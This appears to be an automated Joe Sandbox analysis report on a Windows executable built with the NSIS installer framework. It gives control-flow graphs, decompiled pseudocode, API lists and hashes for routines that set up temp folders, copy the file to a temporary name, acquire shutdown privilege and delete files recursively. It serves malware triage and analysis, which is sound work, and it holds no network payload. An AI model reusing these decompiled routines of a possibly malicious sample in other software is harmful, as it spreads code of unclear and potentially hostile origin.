              control_flow_graph 0 4031f1-403230 SetErrorMode GetVersion 1 403232-40323a call 4062fd 0->1 2 403243 0->2 1->2 7 40323c 1->7 4 403248-40325b call 40628f lstrlenA 2->4 9 40325d-403279 call 4062fd * 3 4->9 7->2 16 40328a-4032ea #17 OleInitialize SHGetFileInfoA call 405f65 GetCommandLineA call 405f65 GetModuleHandleA 9->16 17 40327b-403281 9->17 24 4032f6-40330b call 405928 CharNextA 16->24 25 4032ec-4032f1 16->25 17->16 21 403283 17->21 21->16 28 4033d0-4033d4 24->28 25->24 29 403310-403313 28->29 30 4033da 28->30 31 403315-403319 29->31 32 40331b-403323 29->32 33 4033ed-403407 GetTempPathA call 4031c0 30->33 31->31 31->32 34 403325-403326 32->34 35 40332b-40332e 32->35 43 403409-403427 GetWindowsDirectoryA lstrcatA call 4031c0 33->43 44 40345f-403479 DeleteFileA call 402d48 33->44 34->35 37 4033c0-4033cd call 405928 35->37 38 403334-403338 35->38 37->28 53 4033cf 37->53 41 403350-40337d 38->41 42 40333a-403340 38->42 49 403390-4033be 41->49 50 40337f-403385 41->50 47 403342-403344 42->47 48 403346 42->48 43->44 61 403429-403459 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4031c0 43->61 58 40350d-40351d ExitProcess OleUninitialize 44->58 59 40347f-403485 44->59 47->41 47->48 48->41 49->37 52 4033dc-4033e8 call 405f65 49->52 55 403387-403389 50->55 56 40338b 50->56 52->33 53->28 55->49 55->56 56->49 65 403641-403647 58->65 66 403523-403533 call 405681 ExitProcess 58->66 63 403487-403492 call 405928 59->63 64 4034fd-403504 call 4037b5 59->64 61->44 61->58 81 403494-4034bd 63->81 82 4034c8-4034d2 63->82 73 403509 64->73 71 4036c3-4036cb 65->71 72 403649-403662 GetCurrentProcess OpenProcessToken 65->72 75 4036d1-4036d5 ExitProcess 71->75 76 4036cd 71->76 78 403694-4036a2 call 4062fd 72->78 79 403664-40368e LookupPrivilegeValueA AdjustTokenPrivileges 72->79 73->58 76->75 87 4036b0-4036ba ExitWindowsEx 78->87 88 4036a4-4036ae 78->88 79->78 84 4034bf-4034c1 81->84 85 4034d4-4034e1 call 4059eb 82->85 86 403539-40354d call 4055ec lstrcatA 82->86 84->82 89 4034c3-4034c6 84->89 85->58 95 4034e3-4034f9 call 405f65 * 2 85->95 98 40355a-403574 lstrcatA lstrcmpiA 86->98 99 40354f-403555 lstrcatA 86->99 87->71 92 4036bc-4036be call 40140b 87->92 88->87 88->92 89->82 89->84 92->71 95->64 98->58 101 403576-403579 98->101 99->98 103 403582 call 4055cf 101->103 104 40357b-403580 call 405552 101->104 110 403587-403594 SetCurrentDirectoryA 103->110 104->110 111 4035a1-4035c9 call 405f65 110->111 112 403596-40359c call 405f65 110->112 116 4035cf-4035eb call 405f87 DeleteFileA 111->116 112->111 119 40362c-403633 116->119 120 4035ed-4035fd CopyFileA 116->120 119->116 122 403635-40363c call 405d44 119->122 120->119 121 4035ff-40361f call 405d44 call 405f87 call 405604 120->121 121->119 131 403621-403628 CloseHandle 121->131 122->58 131->119
              C-Code - Quality: 85%
              			_entry_() {
				signed int _t42;
				intOrPtr* _t47;
				CHAR* _t51;
				char* _t54;
				CHAR* _t56;
				void* _t60;
				intOrPtr _t62;
				int _t63;
				int _t66;
				signed int _t67;
				int _t68;
				signed int _t70;
				void* _t94;
				signed int _t110;
				void* _t113;
				void* _t118;
				intOrPtr* _t119;
				char _t122;
				signed int _t141;
				signed int _t142;
				int _t150;
				void* _t151;
				intOrPtr* _t153;
				CHAR* _t156;
				CHAR* _t157;
				void* _t159;
				char* _t160;
				void* _t163;
				void* _t164;
				intOrPtr _t189;

				 *(_t164 + 0x18) = 0;
				 *((intOrPtr*)(_t164 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t164 + 0x20) = 0;
				 *(_t164 + 0x14) = 0x20;
				SetErrorMode(0x8001); // executed
				_t42 = GetVersion() & 0xbfffffff;
				 *0x42f40c = _t42;
				if(_t42 != 6) {
					_t119 = E004062FD(0);
					if(_t119 != 0) {
						 *_t119(0xc00);
					}
				}
				_t156 = "UXTHEME";
				do {
					E0040628F(_t156); // executed
					_t156 =  &(_t156[lstrlenA(_t156) + 1]);
				} while ( *_t156 != 0);
				E004062FD(0xa);
				 *0x42f404 = E004062FD(8);
				_t47 = E004062FD(6);
				if(_t47 != 0) {
					_t47 =  *_t47(0x1e);
					if(_t47 != 0) {
						 *0x42f40f =  *0x42f40f | 0x00000040;
					}
				}
				__imp__#17(_t159);
				__imp__OleInitialize(0); // executed
				 *0x42f4d8 = _t47;
				SHGetFileInfoA(0x429830, 0, _t164 + 0x38, 0x160, 0); // executed
				E00405F65("Setup Setup", "NSIS Error");
				_t51 = GetCommandLineA();
				_t160 = "\"C:\\Users\\alfons\\Desktop\\P196hUN2fw.exe\"";
				E00405F65(_t160, _t51);
				 *0x42f400 = GetModuleHandleA(0);
				_t54 = _t160;
				if("\"C:\\Users\\alfons\\Desktop\\P196hUN2fw.exe\"" == 0x22) {
					 *(_t164 + 0x14) = 0x22;
					_t54 =  &M00435001;
				}
				_t56 = CharNextA(E00405928(_t54,  *(_t164 + 0x14)));
				 *(_t164 + 0x1c) = _t56;
				while(1) {
					_t122 =  *_t56;
					_t172 = _t122;
					if(_t122 == 0) {
						break;
					}
					__eflags = _t122 - 0x20;
					if(_t122 != 0x20) {
						L13:
						__eflags =  *_t56 - 0x22;
						 *(_t164 + 0x14) = 0x20;
						if( *_t56 == 0x22) {
							_t56 =  &(_t56[1]);
							__eflags = _t56;
							 *(_t164 + 0x14) = 0x22;
						}
						__eflags =  *_t56 - 0x2f;
						if( *_t56 != 0x2f) {
							L25:
							_t56 = E00405928(_t56,  *(_t164 + 0x14));
							__eflags =  *_t56 - 0x22;
							if(__eflags == 0) {
								_t56 =  &(_t56[1]);
								__eflags = _t56;
							}
							continue;
						} else {
							_t56 =  &(_t56[1]);
							__eflags =  *_t56 - 0x53;
							if( *_t56 != 0x53) {
								L20:
								__eflags =  *_t56 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
								if( *_t56 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
									L24:
									__eflags =  *((intOrPtr*)(_t56 - 2)) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
									if( *((intOrPtr*)(_t56 - 2)) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
										 *((char*)(_t56 - 2)) = 0;
										__eflags =  &(_t56[2]);
										E00405F65(0x435400,  &(_t56[2]));
										L30:
										_t157 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
										GetTempPathA(0x400, _t157);
										_t60 = E004031C0(_t172);
										_t173 = _t60;
										if(_t60 != 0) {
											L33:
											DeleteFileA("1033"); // executed
											_t62 = E00402D48(_t175,  *(_t164 + 0x20)); // executed
											 *((intOrPtr*)(_t164 + 0x10)) = _t62;
											if(_t62 != 0) {
												L43:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												_t185 =  *((intOrPtr*)(_t164 + 0x10));
												if( *((intOrPtr*)(_t164 + 0x10)) == 0) {
													__eflags =  *0x42f4b4;
													if( *0x42f4b4 == 0) {
														L67:
														_t63 =  *0x42f4cc;
														__eflags = _t63 - 0xffffffff;
														if(_t63 != 0xffffffff) {
															 *(_t164 + 0x14) = _t63;
														}
														ExitProcess( *(_t164 + 0x14));
													}
													_t66 = OpenProcessToken(GetCurrentProcess(), 0x28, _t164 + 0x18);
													__eflags = _t66;
													_t150 = 2;
													if(_t66 != 0) {
														LookupPrivilegeValueA(0, "SeShutdownPrivilege", _t164 + 0x24);
														 *(_t164 + 0x38) = 1;
														 *(_t164 + 0x44) = _t150;
														AdjustTokenPrivileges( *(_t164 + 0x2c), 0, _t164 + 0x28, 0, 0, 0);
													}
													_t67 = E004062FD(4);
													__eflags = _t67;
													if(_t67 == 0) {
														L65:
														_t68 = ExitWindowsEx(_t150, 0x80040002);
														__eflags = _t68;
														if(_t68 != 0) {
															goto L67;
														}
														goto L66;
													} else {
														_t70 =  *_t67(0, 0, 0, 0x25, 0x80040002);
														__eflags = _t70;
														if(_t70 == 0) {
															L66:
															E0040140B(9);
															goto L67;
														}
														goto L65;
													}
												}
												E00405681( *((intOrPtr*)(_t164 + 0x10)), 0x200010);
												ExitProcess(2);
											}
											if( *0x42f420 == 0) {
												L42:
												 *0x42f4cc =  *0x42f4cc | 0xffffffff;
												 *(_t164 + 0x18) = E004037B5( *0x42f4cc);
												goto L43;
											}
											_t153 = E00405928(_t160, 0);
											if(_t153 < _t160) {
												L39:
												_t182 = _t153 - _t160;
												 *((intOrPtr*)(_t164 + 0x10)) = "Error launching installer";
												if(_t153 < _t160) {
													_t151 = E004055EC(_t185);
													lstrcatA(_t157, "~nsu");
													if(_t151 != 0) {
														lstrcatA(_t157, "A");
													}
													lstrcatA(_t157, ".tmp");
													_t162 = "C:\\Users\\alfons\\Desktop";
													if(lstrcmpiA(_t157, "C:\\Users\\alfons\\Desktop") != 0) {
														_push(_t157);
														if(_t151 == 0) {
															E004055CF();
														} else {
															E00405552();
														}
														SetCurrentDirectoryA(_t157);
														_t189 =  *0x435400; // 0x0
														if(_t189 == 0) {
															E00405F65(0x435400, _t162);
														}
														E00405F65(0x430000,  *(_t164 + 0x1c));
														_t137 = "A";
														_t163 = 0x1a;
														 *0x430400 = "A";
														do {
															E00405F87(0, 0x429430, _t157, 0x429430,  *((intOrPtr*)( *0x42f414 + 0x120)));
															DeleteFileA(0x429430);
															if( *((intOrPtr*)(_t164 + 0x10)) != 0 && CopyFileA("C:\\Users\\alfons\\Desktop\\P196hUN2fw.exe", 0x429430, 1) != 0) {
																E00405D44(_t137, 0x429430, 0);
																E00405F87(0, 0x429430, _t157, 0x429430,  *((intOrPtr*)( *0x42f414 + 0x124)));
																_t94 = E00405604(0x429430);
																if(_t94 != 0) {
																	CloseHandle(_t94);
																	 *((intOrPtr*)(_t164 + 0x10)) = 0;
																}
															}
															 *0x430400 =  *0x430400 + 1;
															_t163 = _t163 - 1;
														} while (_t163 != 0);
														E00405D44(_t137, _t157, 0);
													}
													goto L43;
												}
												 *_t153 = 0;
												_t154 = _t153 + 4;
												if(E004059EB(_t182, _t153 + 4) == 0) {
													goto L43;
												}
												E00405F65(0x435400, _t154);
												E00405F65("C:\\Users\\alfons\\AppData\\Local\\Temp\\nst356E.tmp", _t154);
												 *((intOrPtr*)(_t164 + 0x10)) = 0;
												goto L42;
											}
											_t110 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
											while( *_t153 != _t110) {
												_t153 = _t153 - 1;
												if(_t153 >= _t160) {
													continue;
												}
												goto L39;
											}
											goto L39;
										}
										GetWindowsDirectoryA(_t157, 0x3fb);
										lstrcatA(_t157, "\\Temp");
										_t113 = E004031C0(_t173);
										_t174 = _t113;
										if(_t113 != 0) {
											goto L33;
										}
										GetTempPathA(0x3fc, _t157);
										lstrcatA(_t157, "Low");
										SetEnvironmentVariableA("TEMP", _t157);
										SetEnvironmentVariableA("TMP", _t157);
										_t118 = E004031C0(_t174);
										_t175 = _t118;
										if(_t118 == 0) {
											goto L43;
										}
										goto L33;
									}
									goto L25;
								}
								_t141 = _t56[4];
								__eflags = _t141 - 0x20;
								if(_t141 == 0x20) {
									L23:
									_t15 = _t164 + 0x20;
									 *_t15 =  *(_t164 + 0x20) | 0x00000004;
									__eflags =  *_t15;
									goto L24;
								}
								__eflags = _t141;
								if(_t141 != 0) {
									goto L24;
								}
								goto L23;
							}
							_t142 = _t56[1];
							__eflags = _t142 - 0x20;
							if(_t142 == 0x20) {
								L19:
								 *0x42f4c0 = 1;
								goto L20;
							}
							__eflags = _t142;
							if(_t142 != 0) {
								goto L20;
							}
							goto L19;
						}
					} else {
						goto L12;
					}
					do {
						L12:
						_t56 =  &(_t56[1]);
						__eflags =  *_t56 - 0x20;
					} while ( *_t56 == 0x20);
					goto L13;
				}
				goto L30;
			}

































              0x00403201
              0x00403205
              0x0040320d
              0x00403211
              0x00403216
              0x00403222
              0x0040322b
              0x00403230
              0x00403233
              0x0040323a
              0x00403241
              0x00403241
              0x0040323a
              0x00403243
              0x00403248
              0x00403249
              0x00403255
              0x00403259
              0x0040325f
              0x0040326d
              0x00403272
              0x00403279
              0x0040327d
              0x00403281
              0x00403283
              0x00403283
              0x00403281
              0x0040328b
              0x00403292
              0x00403298
              0x004032ae
              0x004032be
              0x004032c3
              0x004032c9
              0x004032d0
              0x004032e3
              0x004032e8
              0x004032ea
              0x004032ec
              0x004032f1
              0x004032f1
              0x00403301
              0x00403307
              0x004033d0
              0x004033d0
              0x004033d2
              0x004033d4
              0x00000000
              0x00000000
              0x00403310
              0x00403313
              0x0040331b
              0x0040331b
              0x0040331e
              0x00403323
              0x00403325
              0x00403325
              0x00403326
              0x00403326
              0x0040332b
              0x0040332e
              0x004033c0
              0x004033c5
              0x004033ca
              0x004033cd
              0x004033cf
              0x004033cf
              0x004033cf
              0x00000000
              0x00403334
              0x00403334
              0x00403335
              0x00403338
              0x00403350
              0x0040337b
              0x0040337d
              0x00403390
              0x004033bb
              0x004033be
              0x004033dc
              0x004033df
              0x004033e8
              0x004033ed
              0x004033f3
              0x004033fe
              0x00403400
              0x00403405
              0x00403407
              0x0040345f
              0x00403464
              0x0040346e
              0x00403475
              0x00403479
              0x0040350d
              0x0040350d
              0x00403512
              0x00403518
              0x0040351d
              0x00403641
              0x00403647
              0x004036c3
              0x004036c3
              0x004036c8
              0x004036cb
              0x004036cd
              0x004036cd
              0x004036d5
              0x004036d5
              0x00403657
              0x0040365f
              0x00403661
              0x00403662
              0x0040366f
              0x00403682
              0x0040368a
              0x0040368e
              0x0040368e
              0x00403696
              0x0040369b
              0x004036a2
              0x004036b0
              0x004036b2
              0x004036b8
              0x004036ba
              0x00000000
              0x00000000
              0x00000000
              0x004036a4
              0x004036aa
              0x004036ac
              0x004036ae
              0x004036bc
              0x004036be
              0x00000000
              0x004036be
              0x00000000
              0x004036ae
              0x004036a2
              0x0040352c
              0x00403533
              0x00403533
              0x00403485
              0x004034fd
              0x004034fd
              0x00403509
              0x00000000
              0x00403509
              0x0040348e
              0x00403492
              0x004034c8
              0x004034c8
              0x004034ca
              0x004034d2
              0x00403544
              0x00403546
              0x0040354d
              0x00403555
              0x00403555
              0x00403560
              0x00403565
              0x00403574
              0x00403578
              0x00403579
              0x00403582
              0x0040357b
              0x0040357b
              0x0040357b
              0x00403588
              0x0040358e
              0x00403594
              0x0040359c
              0x0040359c
              0x004035aa
              0x004035af
              0x004035c1
              0x004035c9
              0x004035cf
              0x004035db
              0x004035e1
              0x004035eb
              0x00403601
              0x00403612
              0x00403618
              0x0040361f
              0x00403622
              0x00403628
              0x00403628
              0x0040361f
              0x0040362c
              0x00403632
              0x00403632
              0x00403637
              0x00403637
              0x00000000
              0x00403574
              0x004034d4
              0x004034d6
              0x004034e1
              0x00000000
              0x00000000
              0x004034e9
              0x004034f4
              0x004034f9
              0x00000000
              0x004034f9
              0x004034bd
              0x004034bf
              0x004034c3
              0x004034c6
              0x00000000
              0x00000000
              0x00000000
              0x004034c6
              0x00000000
              0x004034bf
              0x0040340f
              0x0040341b
              0x00403420
              0x00403425
              0x00403427
              0x00000000
              0x00000000
              0x0040342f
              0x00403437
              0x00403448
              0x00403450
              0x00403452
              0x00403457
              0x00403459
              0x00000000
              0x00000000
              0x00000000
              0x00403459
              0x00000000
              0x004033be
              0x0040337f
              0x00403382
              0x00403385
              0x0040338b
              0x0040338b
              0x0040338b
              0x0040338b
              0x00000000
              0x0040338b
              0x00403387
              0x00403389
              0x00000000
              0x00000000
              0x00000000
              0x00403389
              0x0040333a
              0x0040333d
              0x00403340
              0x00403346
              0x00403346
              0x00000000
              0x00403346
              0x00403342
              0x00403344
              0x00000000
              0x00000000
              0x00000000
              0x00403344
              0x00000000
              0x00000000
              0x00000000
              0x00403315
              0x00403315
              0x00403315
              0x00403316
              0x00403316
              0x00000000
              0x00403315
              0x00000000

              APIs
              • SetErrorMode.KERNELBASE ref: 00403216
              • GetVersion.KERNEL32 ref: 0040321C
              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040324F
              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040328B
              • OleInitialize.OLE32(00000000), ref: 00403292
              • SHGetFileInfoA.SHELL32(00429830,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004032AE
              • GetCommandLineA.KERNEL32(Setup Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004032C3
              • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\P196hUN2fw.exe",00000000,?,00000006,00000008,0000000A), ref: 004032D6
              • CharNextA.USER32(00000000,"C:\Users\user\Desktop\P196hUN2fw.exe",00000020,?,00000006,00000008,0000000A), ref: 00403301
              • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 004033FE
              • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 0040340F
              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040341B
              • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040342F
              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403437
              • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403448
              • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403450
              • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403464
                • Part of subcall function 004062FD: GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
                • Part of subcall function 004062FD: GetProcAddress.KERNEL32(00000000,?), ref: 0040632A
                • Part of subcall function 00405F65: lstrcpynA.KERNEL32(?,?,00000400,004032C3,Setup Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F72
                • Part of subcall function 004037B5: GetUserDefaultUILanguage.KERNELBASE(00000002,766DFA90,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\P196hUN2fw.exe",00000000), ref: 004037CF
                • Part of subcall function 004037B5: lstrlenA.KERNEL32(0042E3A0,?,?,?,0042E3A0,00000000,00435400,1033,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000,00000002,766DFA90), ref: 004038A5
                • Part of subcall function 004037B5: lstrcmpiA.KERNEL32(?,.exe,0042E3A0,?,?,?,0042E3A0,00000000,00435400,1033,0042A870,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A870,00000000), ref: 004038B8
                • Part of subcall function 004037B5: GetFileAttributesA.KERNEL32(0042E3A0), ref: 004038C3
                • Part of subcall function 004037B5: LoadImageA.USER32 ref: 0040390C
                • Part of subcall function 004037B5: RegisterClassA.USER32 ref: 00403949
              • ExitProcess.KERNEL32(?,?,00000006,00000008,0000000A), ref: 0040350D
                • Part of subcall function 004036DB: CloseHandle.KERNEL32(FFFFFFFF,00403512,?,?,00000006,00000008,0000000A), ref: 004036E6
              • OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 00403512
              • ExitProcess.KERNEL32 ref: 00403533
              • GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 00403650
              • OpenProcessToken.ADVAPI32(00000000), ref: 00403657
              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040366F
              • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 0040368E
              • ExitWindowsEx.USER32(00000002,80040002), ref: 004036B2
              • ExitProcess.KERNEL32 ref: 004036D5
                • Part of subcall function 00405681: MessageBoxIndirectA.USER32 ref: 004056DC
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.497583123.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.497576067.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497592829.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497600698.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.497657116.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_P196hUN2fw.jbxd
              Similarity
              • API ID: Process$Exit$FileHandle$EnvironmentModulePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpilstrcpyn
              • String ID: "$"C:\Users\user\Desktop\P196hUN2fw.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nst356E.tmp$C:\Users\user\Desktop$C:\Users\user\Desktop\P196hUN2fw.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$Setup Setup$TEMP$TMP$UXTHEME$\Temp$~nsu
              • API String ID: 3861850387-1713095991
              • Opcode ID: 43770b6c325a099cedcf9499065752b98bf324a98eae67160cb2c941fe278442
              • Instruction ID: 41c275c355797b12fd9b138c60a2ad170ddd3a1f93bd6a9867a2704463122372
              • Opcode Fuzzy Hash: 43770b6c325a099cedcf9499065752b98bf324a98eae67160cb2c941fe278442
              • Instruction Fuzzy Hash: 0DC1E470604741AAD7216F759E49B2F3EACAF45706F44053FF581B61E2CB7C8A098B2E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 0040572D Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 159filestringCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 272 40572d-405753 call 4059eb 275 405755-405767 DeleteFileA 272->275 276 40576c-405773 272->276 277 4058f6-4058fa 275->277 278 405775-405777 276->278 279 405786-405796 call 405f65 276->279 280 4058a4-4058a9 278->280 281 40577d-405780 278->281 287 4057a5-4057a6 call 405944 279->287 288 405798-4057a3 lstrcatA 279->288 280->277 284 4058ab-4058ae 280->284 281->279 281->280 285 4058b0-4058b6 284->285 286 4058b8-4058c0 call 406268 284->286 285->277 286->277 295 4058c2-4058d6 call 4058fd call 4056e5 286->295 290 4057ab-4057ae 287->290 288->290 293 4057b0-4057b7 290->293 294 4057b9-4057bf lstrcatA 290->294 293->294 296 4057c4-4057e2 lstrlenA FindFirstFileA 293->296 294->296 311 4058d8-4058db 295->311 312 4058ee-4058f1 call 40508c 295->312 298 4057e8-4057ff call 405928 296->298 299 40589a-40589e 296->299 305 405801-405805 298->305 306 40580a-40580d 298->306 299->280 301 4058a0 299->301 301->280 305->306 308 405807 305->308 309 405820-40582e call 405f65 306->309 310 40580f-405814 306->310 308->306 322 405830-405838 309->322 323 405845-405850 call 4056e5 309->323 314 405816-405818 310->314 315 405879-40588b FindNextFileA 310->315 311->285 317 4058dd-4058ec call 40508c call 405d44 311->317 312->277 314->309 318 40581a-40581e 314->318 315->298 320 405891-405894 FindClose 315->320 317->277 318->309 318->315 320->299 322->315 325 40583a-405843 call 40572d 322->325 331 405871-405874 call 40508c 323->331 332 405852-405855 323->332 325->315 331->315 334 405857-405867 call 40508c call 405d44 332->334 335 405869-40586f 332->335 334->315 335->315
              C-Code - Quality: 98%
              			E0040572D(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E004059EB(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42f4a8 =  *0x42f4a8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00405F65(0x42b878, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405944(_t73);
					} else {
						lstrcatA(0x42b878, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]); // executed
						_t40 = FindFirstFileA(0x42b878,  &_v336); // executed
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405928( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E00405F65(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004056E5(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E0040508C(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42f4a8 =  *0x42f4a8 + 1;
										} else {
											E0040508C(0xfffffff1, _t73);
											E00405D44(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040572D(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336); // executed
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42b878 - 0x5c;
					if( *0x42b878 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E00406268(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E004058FD(_t73);
							_t40 = E004056E5(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E0040508C(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E0040508C(0xfffffff1, _t73);
							return E00405D44(_t72, _t73, 0);
						}
						L33:
						 *0x42f4a8 =  *0x42f4a8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















              0x00405737
              0x0040573c
              0x00405745
              0x00405748
              0x00405750
              0x00405753
              0x00405756
              0x0040575e
              0x00405760
              0x00405761
              0x00000000
              0x00405761
              0x0040576c
              0x0040576f
              0x0040576f
              0x0040576f
              0x00405773
              0x00405786
              0x0040578d
              0x00405792
              0x00405796
              0x004057a6
              0x00405798
              0x0040579e
              0x0040579e
              0x004057ab
              0x004057ae
              0x004057b9
              0x004057bf
              0x004057c4
              0x004057d4
              0x004057d6
              0x004057dc
              0x004057df
              0x004057e2
              0x0040589a
              0x0040589a
              0x0040589e
              0x004058a0
              0x004058a0
              0x004058a0
              0x004058a0
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004057e8
              0x004057e8
              0x004057f1
              0x004057f7
              0x004057fc
              0x004057ff
              0x00405801
              0x00405805
              0x00405807
              0x00405807
              0x00405805
              0x0040580a
              0x0040580d
              0x00405820
              0x00405822
              0x00405827
              0x0040582e
              0x00405849
              0x0040584e
              0x00405850
              0x00405874
              0x00405852
              0x00405852
              0x00405855
              0x00405869
              0x00405857
              0x0040585a
              0x00405862
              0x00405862
              0x00405855
              0x00405830
              0x00405836
              0x00405838
              0x0040583e
              0x0040583e
              0x00405838
              0x00000000
              0x0040582e
